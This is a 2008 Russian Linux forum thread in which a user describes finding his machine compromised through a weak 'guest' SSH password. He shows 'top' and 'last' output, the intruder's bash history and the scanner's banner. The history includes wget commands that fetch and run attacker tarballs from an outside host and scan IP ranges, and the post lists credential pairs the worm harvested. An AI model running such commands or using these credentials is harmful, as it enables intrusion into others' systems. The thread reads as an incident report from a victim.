мой лялих взломали :(

0

0

Сижу значит, лор читаю. И вдруг заметил, что плохо грузиться странички стали. Посмотрел в топ и ахнул:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
28311 guest     20   0  1720  508  420 R 70.6  0.0   2:38.36 pscan2
25500 root      20   0  376m  34m 9812 S  9.8  1.7  55:58.57 Xorg

Сначало я подумал, что это что в вайне крутиться. Убил - не помогло. Потом заметил странность - юзер guest. Первым делом сменил пароль на guest (а он у меня был guest1, толи guest_guest). Однако текущая сессия не завершилась. Убивал так:

ps h -o pid -U guest | xargs sudo kill -9

Вроде отпустило, уф.

Нашел интересный тред: http://ubuntuforums.org/archive/index.php/t-253373.html

Там узнал про команду last. Меня имели целых три дня (только левые логины):

guest    pts/3   80.97.153.252    Wed Nov 26 08:00 - 23:26  (15:25)    
guest    pts/3   80.97.153.252    Wed Nov 26 05:05 - 05:41  (00:35)    
guest    pts/2   89.114.144.135   Tue Nov 25 06:42 - 06:43  (00:00)    
guest    pts/0   80.97.153.252    Tue Nov 25 05:02 - 14:54  (09:51)    
guest    pts/0   89.114.144.135   Tue Nov 25 04:58 - 05:02  (00:04)    
guest    pts/10  89.114.144.135   Mon Nov 24 19:29 - 19:30  (00:01)    
guest    pts/9   a34.csc.lv       Mon Nov 24 19:19 - 19:52  (00:33)

Запомните этих ублюдков! (поправка - беспечных пользователей лялиха)

А теперь, что творили на машине (не интересные моменты вырезаны):

$sudo cat /home/guest/.bash_history

wget members.lycos.co.uk/arnibots/vio-linux.tgz;tar xzvf vio-linux.tgz;cd .m;./bash
cd /var/tmp
ls
ls -la
wget members.lycos.co.uk/arnibots/bengos.tgz
tar xzvf bengos.tgz
cd bengos
w
ps -x
cd /var/tmp
ls
cd bengos
ls
cat nobash.txt 
cd /var/tmp/bengos
./ a 165.91
./a 165.91
./a 209.155
./a 195.85
./a 64.45

Так-с. Посмотрел файлик /var/tmp/bengos/pass.txt, среди прочего есть пара «guest guest1». Хи, хи.

Кстати, червь мне наворовал порядка двадцати адресков беспечных лялихсойдов. IP публиковать не буду, а вот логин-пароль:

$cat /var/tmp/bengos/nobash.txt | awk '{print $1 "\t" $2}'

admin	sysmail
admin	sysmail
admin	sysmail
admin	sysmail
root	beach
root	beach
root	beach
stud	stud
trash	trash
aaron	aaron123
admin	sysmail
admin	sysmail
stud	stud
trash	trash
aaron	aaron123
gt05	gt05
test	abc123

Исходники на сканер приложены, а вот на бинарь ss и sshd нет.

echo "[]  [] [] [][]   [][]    []   [][][] []  []"
echo "[] []  [] [] []  [] []  [][]  []     [] []"
echo "[][]   [] []  [] [][]  []  [] []     [][]"
echo "[] []  [] [] []  [] []  [][]  []     [] []"
echo "[]  [] [] [][]   []  []  []   [][][] []  []"
echo "[*] Scanner Made bY KidRock & The #KidRockS Team [*]"

Собственно несколько вопросов:

1. Что делать? Достаточно ли сменить пароль?

2. Как прибить пользователя (logout)? Есть ли какая команда?

P.S. Теперь и на лоре есть полужирный бибикот!

Ссылка

← 1 2 →

> Что делать? Достаточно ли сменить пароль?

Достаточно перестать троллить на ЛОРе и не открывать ssh, который по умолчанию закрыт.

> Как прибить пользователя

Похвально, бери молоток и бей себе по черепу.

anonymous
(27.11.08 21:54:41 MSK)

Ответ на: комментарий от gnomino 27.11.08 12:50:03 MSK

>Много ты видел установленных кейлогеров у знакомых? ну вообще-то кейлоггер так пишут, что бы ты его и не увидел, только если специально начнёшь гадость искать.

mic ★★★★★
(28.11.08 09:15:36 MSK)

Похожие темы